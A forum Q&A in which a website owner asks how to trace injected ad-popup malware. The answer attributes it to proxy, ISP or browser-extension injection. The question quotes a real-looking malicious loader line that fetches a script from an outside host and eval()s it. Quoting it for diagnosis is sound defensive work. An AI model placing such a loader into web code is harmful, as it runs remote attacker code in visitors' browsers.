Jason Paddle Jason Paddle - 15 days ago 9
Javascript Question

Finding malware on website

I'm a little bit lost on this issue, so please excuse me. I know there are other threads on SO about this but I can't find the answer.

On the site when it's loaded it doesn't matter where the user click it is open addition tab in browser with ads.

What I was able to find so far by looking at the browser console is that is loaded some js file

http://cdn.mecash.ru/js/replace.js


This file contain

!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);


and by looking at this
tx.js
I suspect that this is the injected by the hacker.

The problem is that I've been looking at the files on the host and can't find any include or something of this
js
..

Can someone help me and tell where or probably how can I find it?

Answer

Actually such kind of files are injected when the data is transmitted from server to client. Your actual code dosen't contains the script but, they are injected and executes on client machine..

Possibly injected by :

  • Third party proxies, proxy servers used.
  • Injected by ISP's in some cases.
  • Malicious/Compromised browser extension installed.

You can avoid proxy/ISP injecting by transferring content over https instead of http. However, injecting done by browswer extensions can be avoided by uninstalling extensions only.